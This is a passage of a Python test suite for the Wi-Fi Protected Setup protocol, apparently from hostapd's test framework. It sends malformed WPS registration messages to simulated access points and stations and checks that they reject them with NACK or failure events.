attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
attrs += build_wsc_attr(ATTR_R_HASH1, r_hash1)
attrs += build_wsc_attr(ATTR_R_HASH2, r_hash2)
attrs += build_attr_authenticator(authkey, m3, attrs)
m4 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m4)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M5 (NACK) from STA")
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_Nack")
dev[0].request("WPS_CANCEL")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_disconnected()
def test_wps_ext_proto_m6_missing_r_snonce2(dev, apdev):
"""WPS and no R-SNonce2 in M6"""
eap_id, e_nonce, r_nonce, bssid, r_hash1, r_hash2, r_s2, m5, authkey, keywrapkey = wps_to_m5(dev, apdev)
logger.debug("Send M6 to STA")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M6)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
#data = build_wsc_attr(ATTR_R_SNONCE2, r_s2)
data = b''
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, m5, attrs)
m6 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m6)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M7 (NACK) from STA")
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_Nack")
dev[0].request("WPS_CANCEL")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_disconnected()
def test_wps_ext_proto_m6_no_encr_settings(dev, apdev):
"""WPS and no Encr Settings in M6"""
eap_id, e_nonce, r_nonce, bssid, r_hash1, r_hash2, r_s2, m5, authkey, keywrapkey = wps_to_m5(dev, apdev)
logger.debug("Send M6 to STA")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M6)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
data = build_wsc_attr(ATTR_R_SNONCE2, r_s2)
#attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, m5, attrs)
m6 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m6)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M7 (NACK) from STA")
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_Nack")
dev[0].request("WPS_CANCEL")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_disconnected()
def test_wps_ext_proto_m8_no_encr_settings(dev, apdev):
    """WPS and no Encr Settings in M8"""
eap_id, e_nonce, r_nonce, bssid, r_hash1, r_hash2, r_s2, m5, authkey, keywrapkey = wps_to_m5(dev, apdev)
logger.debug("Send M6 to STA")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M6)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
data = build_wsc_attr(ATTR_R_SNONCE2, r_s2)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, m5, attrs)
raw_m6_attrs = attrs
m6 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m6)
eap_id = (eap_id + 1) % 256
logger.debug("Receive M7 from STA")
msg, m7_attrs, raw_m7_attrs = recv_wsc_msg(dev[0], WSC_MSG, WPS_M7)
logger.debug("Send M8 to STA")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M8)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
#attrs += build_attr_encr_settings(authkey, keywrapkey, m8_cred)
attrs += build_attr_authenticator(authkey, raw_m7_attrs, attrs)
raw_m8_attrs = attrs
m8 = build_eap_wsc(1, eap_id, attrs)
send_wsc_msg(dev[0], bssid, m8)
logger.debug("Receive WSC_Done (NACK) from STA")
msg = get_wsc_msg(dev[0])
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_Nack")
dev[0].request("WPS_CANCEL")
send_wsc_msg(dev[0], bssid, build_eap_failure(eap_id))
dev[0].wait_disconnected()
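# wps_start_ext_reg() starts an AP with a known AP PIN and has dev act as an
# external registrar (WPS_REG), with EAPOL frames on both ends routed through
# the test script.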
def wps_start_ext_reg(apdev, dev):
addr = dev.own_addr()
bssid = apdev['bssid']
ssid = "test-wps-conf"
appin = "12345670"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"ap_pin": appin }
hapd = hostapd.add_ap(apdev, params)
dev.scan_for_bss(bssid, freq="2412")
hapd.request("SET ext_eapol_frame_io 1")
dev.request("SET ext_eapol_frame_io 1")
dev.request("WPS_REG " + bssid + " " + appin)
return addr,bssid,hapd
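# wps_run_ap_settings_proto() plays the external registrar side (M2, M4, M6,
# M8), delivering the given ap_settings in M8, and then expects either
# WPS-NEW-AP-SETTINGS or WPS-FAIL depending on the success argument.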
def wps_run_ap_settings_proto(dev, apdev, ap_settings, success):
addr,bssid,hapd = wps_start_ext_reg(apdev[0], dev[0])
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive M1 from AP")
msg, m1_attrs, raw_m1_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M1)
mac_addr = m1_attrs[ATTR_MAC_ADDR]
e_nonce = m1_attrs[ATTR_ENROLLEE_NONCE]
e_pk = m1_attrs[ATTR_PUBLIC_KEY]
appin = '12345670'
uuid_r = 16*b'\x33'
r_nonce = 16*b'\x44'
own_private, r_pk = wsc_dh_init()
authkey,keywrapkey = wsc_dh_kdf(e_pk, own_private, mac_addr, e_nonce,
r_nonce)
r_s1,r_s2,r_hash1,r_hash2 = wsc_dev_pw_hash(authkey, appin, e_pk, r_pk)
logger.debug("Send M2 to AP")
m2, raw_m2_attrs = build_m2(authkey, raw_m1_attrs, msg['eap_identifier'],
e_nonce, r_nonce, uuid_r, r_pk, eap_code=2)
send_wsc_msg(hapd, addr, m2)
logger.debug("Receive M3 from AP")
msg, m3_attrs, raw_m3_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M3)
logger.debug("Send M4 to AP")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M4)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
attrs += build_wsc_attr(ATTR_R_HASH1, r_hash1)
attrs += build_wsc_attr(ATTR_R_HASH2, r_hash2)
data = build_wsc_attr(ATTR_R_SNONCE1, r_s1)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m3_attrs, attrs)
raw_m4_attrs = attrs
m4 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m4)
logger.debug("Receive M5 from AP")
msg, m5_attrs, raw_m5_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M5)
    logger.debug("Send M6 to AP")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M6)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
data = build_wsc_attr(ATTR_R_SNONCE2, r_s2)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m5_attrs, attrs)
raw_m6_attrs = attrs
m6 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m6)
logger.debug("Receive M7 from AP")
msg, m7_attrs, raw_m7_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M7)
    logger.debug("Send M8 to AP")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M8)
attrs += build_wsc_attr(ATTR_ENROLLEE_NONCE, e_nonce)
if ap_settings:
attrs += build_attr_encr_settings(authkey, keywrapkey, ap_settings)
attrs += build_attr_authenticator(authkey, raw_m7_attrs, attrs)
raw_m8_attrs = attrs
m8 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m8)
if success:
ev = hapd.wait_event(["WPS-NEW-AP-SETTINGS"], timeout=5)
if ev is None:
raise Exception("New AP settings not reported")
logger.debug("Receive WSC_Done from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Done:
raise Exception("Unexpected message - expected WSC_Done")
logger.debug("Send WSC_ACK to AP")
ack,attrs = build_ack(msg['eap_identifier'], e_nonce, r_nonce,
eap_code=2)
send_wsc_msg(hapd, addr, ack)
dev[0].wait_disconnected()
else:
ev = hapd.wait_event(["WPS-FAIL"], timeout=5)
if ev is None:
raise Exception("WPS failure not reported")
logger.debug("Receive WSC_NACK from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_NACK")
logger.debug("Send WSC_NACK to AP")
nack,attrs = build_nack(msg['eap_identifier'], e_nonce, r_nonce,
eap_code=2)
send_wsc_msg(hapd, addr, nack)
dev[0].wait_disconnected()
def test_wps_ext_ap_settings_success(dev, apdev):
"""WPS and AP Settings: success"""
    ap_settings = build_wsc_attr(ATTR_NETWORK_INDEX, b'\x01')
    ap_settings += build_wsc_attr(ATTR_SSID, b"test")
    ap_settings += build_wsc_attr(ATTR_AUTH_TYPE, b'\x00\x01')
    ap_settings += build_wsc_attr(ATTR_ENCR_TYPE, b'\x00\x01')
    ap_settings += build_wsc_attr(ATTR_NETWORK_KEY, b'')
    ap_settings += build_wsc_attr(ATTR_MAC_ADDR, binascii.unhexlify(apdev[0]['bssid'].replace(':', '')))
wps_run_ap_settings_proto(dev, apdev, ap_settings, True)
@remote_compatible
def test_wps_ext_ap_settings_missing(dev, apdev):
"""WPS and AP Settings: missing"""
wps_run_ap_settings_proto(dev, apdev, None, False)
@remote_compatible
def test_wps_ext_ap_settings_mac_addr_mismatch(dev, apdev):
"""WPS and AP Settings: MAC Address mismatch"""
    ap_settings = build_wsc_attr(ATTR_NETWORK_INDEX, b'\x01')
    ap_settings += build_wsc_attr(ATTR_SSID, b"test")
    ap_settings += build_wsc_attr(ATTR_AUTH_TYPE, b'\x00\x01')
    ap_settings += build_wsc_attr(ATTR_ENCR_TYPE, b'\x00\x01')
    ap_settings += build_wsc_attr(ATTR_NETWORK_KEY, b'')
    ap_settings += build_wsc_attr(ATTR_MAC_ADDR, 6*b'\x00')
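    # The mismatching MAC Address value above is accepted by the enrollee AP,
    # so this exchange is still expected to succeed.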
wps_run_ap_settings_proto(dev, apdev, ap_settings, True)
@remote_compatible
def test_wps_ext_ap_settings_mac_addr_missing(dev, apdev):
"""WPS and AP Settings: missing MAC Address"""
    ap_settings = build_wsc_attr(ATTR_NETWORK_INDEX, b'\x01')
    ap_settings += build_wsc_attr(ATTR_SSID, b"test")
    ap_settings += build_wsc_attr(ATTR_AUTH_TYPE, b'\x00\x01')
    ap_settings += build_wsc_attr(ATTR_ENCR_TYPE, b'\x00\x01')
    ap_settings += build_wsc_attr(ATTR_NETWORK_KEY, b'')
wps_run_ap_settings_proto(dev, apdev, ap_settings, False)
@remote_compatible
def test_wps_ext_ap_settings_reject_encr_type(dev, apdev):
"""WPS and AP Settings: reject Encr Type"""
    ap_settings = build_wsc_attr(ATTR_NETWORK_INDEX, b'\x01')
    ap_settings += build_wsc_attr(ATTR_SSID, b"test")
    ap_settings += build_wsc_attr(ATTR_AUTH_TYPE, b'\x00\x01')
    ap_settings += build_wsc_attr(ATTR_ENCR_TYPE, b'\x00\x00')
    ap_settings += build_wsc_attr(ATTR_NETWORK_KEY, b'')
    ap_settings += build_wsc_attr(ATTR_MAC_ADDR, binascii.unhexlify(apdev[0]['bssid'].replace(':', '')))
wps_run_ap_settings_proto(dev, apdev, ap_settings, False)
@remote_compatible
def test_wps_ext_ap_settings_m2d(dev, apdev):
"""WPS and AP Settings: M2D"""
addr,bssid,hapd = wps_start_ext_reg(apdev[0], dev[0])
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive M1 from AP")
msg, m1_attrs, raw_m1_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M1)
e_nonce = m1_attrs[ATTR_ENROLLEE_NONCE]
    r_nonce = 16*b'\x44'
    uuid_r = 16*b'\x33'
logger.debug("Send M2D to AP")
m2d, raw_m2d_attrs = build_m2d(raw_m1_attrs, msg['eap_identifier'],
e_nonce, r_nonce, uuid_r,
                                   dev_pw_id=b'\x00\x00', eap_code=2)
send_wsc_msg(hapd, addr, m2d)
ev = hapd.wait_event(["WPS-M2D"], timeout=5)
if ev is None:
raise Exception("M2D not reported")
wps_wait_ap_nack(hapd, dev[0], e_nonce, r_nonce)
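# wps_wait_ap_nack() verifies that the AP responds with WSC_NACK, sends a
# NACK back to the AP, and waits for the station to disconnect.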
def wps_wait_ap_nack(hapd, dev, e_nonce, r_nonce):
logger.debug("Receive WSC_NACK from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_NACK:
raise Exception("Unexpected message - expected WSC_NACK")
logger.debug("Send WSC_NACK to AP")
nack,attrs = build_nack(msg['eap_identifier'], e_nonce, r_nonce,
eap_code=2)
send_wsc_msg(hapd, dev.own_addr(), nack)
dev.wait_disconnected()
@remote_compatible
def test_wps_ext_m3_missing_e_hash1(dev, apdev):
"""WPS proto: M3 missing E-Hash1"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send M3 to AP")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M3)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
#attrs += build_wsc_attr(ATTR_E_HASH1, e_hash1)
attrs += build_wsc_attr(ATTR_E_HASH2, e_hash2)
attrs += build_attr_authenticator(authkey, raw_m2_attrs, attrs)
raw_m3_attrs = attrs
m3 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m3)
wps_wait_ap_nack(hapd, dev[0], e_nonce, r_nonce)
@remote_compatible
def test_wps_ext_m3_missing_e_hash2(dev, apdev):
"""WPS proto: M3 missing E-Hash2"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send M3 to AP")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M3)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
attrs += build_wsc_attr(ATTR_E_HASH1, e_hash1)
#attrs += build_wsc_attr(ATTR_E_HASH2, e_hash2)
attrs += build_attr_authenticator(authkey, raw_m2_attrs, attrs)
raw_m3_attrs = attrs
m3 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m3)
wps_wait_ap_nack(hapd, dev[0], e_nonce, r_nonce)
@remote_compatible
def test_wps_ext_m5_missing_e_snonce1(dev, apdev):
"""WPS proto: M5 missing E-SNonce1"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send M3 to AP")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M3)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
attrs += build_wsc_attr(ATTR_E_HASH1, e_hash1)
attrs += build_wsc_attr(ATTR_E_HASH2, e_hash2)
attrs += build_attr_authenticator(authkey, raw_m2_attrs, attrs)
raw_m3_attrs = attrs
m3 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m3)
logger.debug("Receive M4 from AP")
msg, m4_attrs, raw_m4_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M4)
logger.debug("Send M5 to AP")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M5)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
#data = build_wsc_attr(ATTR_E_SNONCE1, e_s1)
data = b''
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m4_attrs, attrs)
raw_m5_attrs = attrs
m5 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m5)
wps_wait_ap_nack(hapd, dev[0], e_nonce, r_nonce)
@remote_compatible
def test_wps_ext_m5_e_snonce1_mismatch(dev, apdev):
"""WPS proto: M5 E-SNonce1 mismatch"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send M3 to AP")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M3)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
attrs += build_wsc_attr(ATTR_E_HASH1, e_hash1)
attrs += build_wsc_attr(ATTR_E_HASH2, e_hash2)
attrs += build_attr_authenticator(authkey, raw_m2_attrs, attrs)
raw_m3_attrs = attrs
m3 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m3)
logger.debug("Receive M4 from AP")
msg, m4_attrs, raw_m4_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M4)
logger.debug("Send M5 to AP")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M5)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
    data = build_wsc_attr(ATTR_E_SNONCE1, 16*b'\x00')
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m4_attrs, attrs)
raw_m5_attrs = attrs
m5 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m5)
wps_wait_ap_nack(hapd, dev[0], e_nonce, r_nonce)
def test_wps_ext_m7_missing_e_snonce2(dev, apdev):
"""WPS proto: M7 missing E-SNonce2"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send M3 to AP")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M3)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
attrs += build_wsc_attr(ATTR_E_HASH1, e_hash1)
attrs += build_wsc_attr(ATTR_E_HASH2, e_hash2)
attrs += build_attr_authenticator(authkey, raw_m2_attrs, attrs)
raw_m3_attrs = attrs
m3 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m3)
logger.debug("Receive M4 from AP")
msg, m4_attrs, raw_m4_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M4)
logger.debug("Send M5 to AP")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M5)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
data = build_wsc_attr(ATTR_E_SNONCE1, e_s1)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m4_attrs, attrs)
raw_m5_attrs = attrs
m5 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m5)
logger.debug("Receive M6 from AP")
msg, m6_attrs, raw_m6_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M6)
logger.debug("Send M7 to AP")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M7)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
#data = build_wsc_attr(ATTR_E_SNONCE2, e_s2)
data = b''
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m6_attrs, attrs)
m7 = build_eap_wsc(2, msg['eap_identifier'], attrs)
raw_m7_attrs = attrs
send_wsc_msg(hapd, addr, m7)
wps_wait_ap_nack(hapd, dev[0], e_nonce, r_nonce)
@remote_compatible
def test_wps_ext_m7_e_snonce2_mismatch(dev, apdev):
"""WPS proto: M7 E-SNonce2 mismatch"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
uuid_e = 16*b'\x11'
e_nonce = 16*b'\x22'
own_private, e_pk = wsc_dh_init()
logger.debug("Send M1 to AP")
m1, raw_m1_attrs = build_m1(msg['eap_identifier'], uuid_e, mac_addr,
e_nonce, e_pk)
send_wsc_msg(hapd, addr, m1)
logger.debug("Receive M2 from AP")
msg, m2_attrs, raw_m2_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M2)
r_nonce = m2_attrs[ATTR_REGISTRAR_NONCE]
r_pk = m2_attrs[ATTR_PUBLIC_KEY]
authkey,keywrapkey = wsc_dh_kdf(r_pk, own_private, mac_addr, e_nonce,
r_nonce)
e_s1,e_s2,e_hash1,e_hash2 = wsc_dev_pw_hash(authkey, pin, e_pk, r_pk)
logger.debug("Send M3 to AP")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M3)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
attrs += build_wsc_attr(ATTR_E_HASH1, e_hash1)
attrs += build_wsc_attr(ATTR_E_HASH2, e_hash2)
attrs += build_attr_authenticator(authkey, raw_m2_attrs, attrs)
raw_m3_attrs = attrs
m3 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m3)
logger.debug("Receive M4 from AP")
msg, m4_attrs, raw_m4_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M4)
logger.debug("Send M5 to AP")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M5)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
data = build_wsc_attr(ATTR_E_SNONCE1, e_s1)
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m4_attrs, attrs)
raw_m5_attrs = attrs
m5 = build_eap_wsc(2, msg['eap_identifier'], attrs)
send_wsc_msg(hapd, addr, m5)
logger.debug("Receive M6 from AP")
msg, m6_attrs, raw_m6_attrs = recv_wsc_msg(hapd, WSC_MSG, WPS_M6)
logger.debug("Send M7 to AP")
    attrs = build_wsc_attr(ATTR_VERSION, b'\x10')
attrs += build_attr_msg_type(WPS_M7)
attrs += build_wsc_attr(ATTR_REGISTRAR_NONCE, r_nonce)
    data = build_wsc_attr(ATTR_E_SNONCE2, 16*b'\x00')
attrs += build_attr_encr_settings(authkey, keywrapkey, data)
attrs += build_attr_authenticator(authkey, raw_m6_attrs, attrs)
m7 = build_eap_wsc(2, msg['eap_identifier'], attrs)
raw_m7_attrs = attrs
send_wsc_msg(hapd, addr, m7)
wps_wait_ap_nack(hapd, dev[0], e_nonce, r_nonce)
@remote_compatible
def test_wps_ext_m1_pubkey_oom(dev, apdev):
"""WPS proto: M1 PubKey OOM"""
pin = "12345670"
addr,bssid,hapd = wps_start_ext(apdev[0], dev[0], pin=pin)
wps_ext_eap_identity_req(dev[0], hapd, bssid)
wps_ext_eap_identity_resp(hapd, dev[0], addr)
logger.debug("Receive WSC/Start from AP")
msg = get_wsc_msg(hapd)
if msg['wsc_opcode'] != WSC_Start:
raise Exception("Unexpected Op-Code for WSC/Start")
mac_addr = binascii.unhexlify(dev[0].own_addr().replace(':', ''))
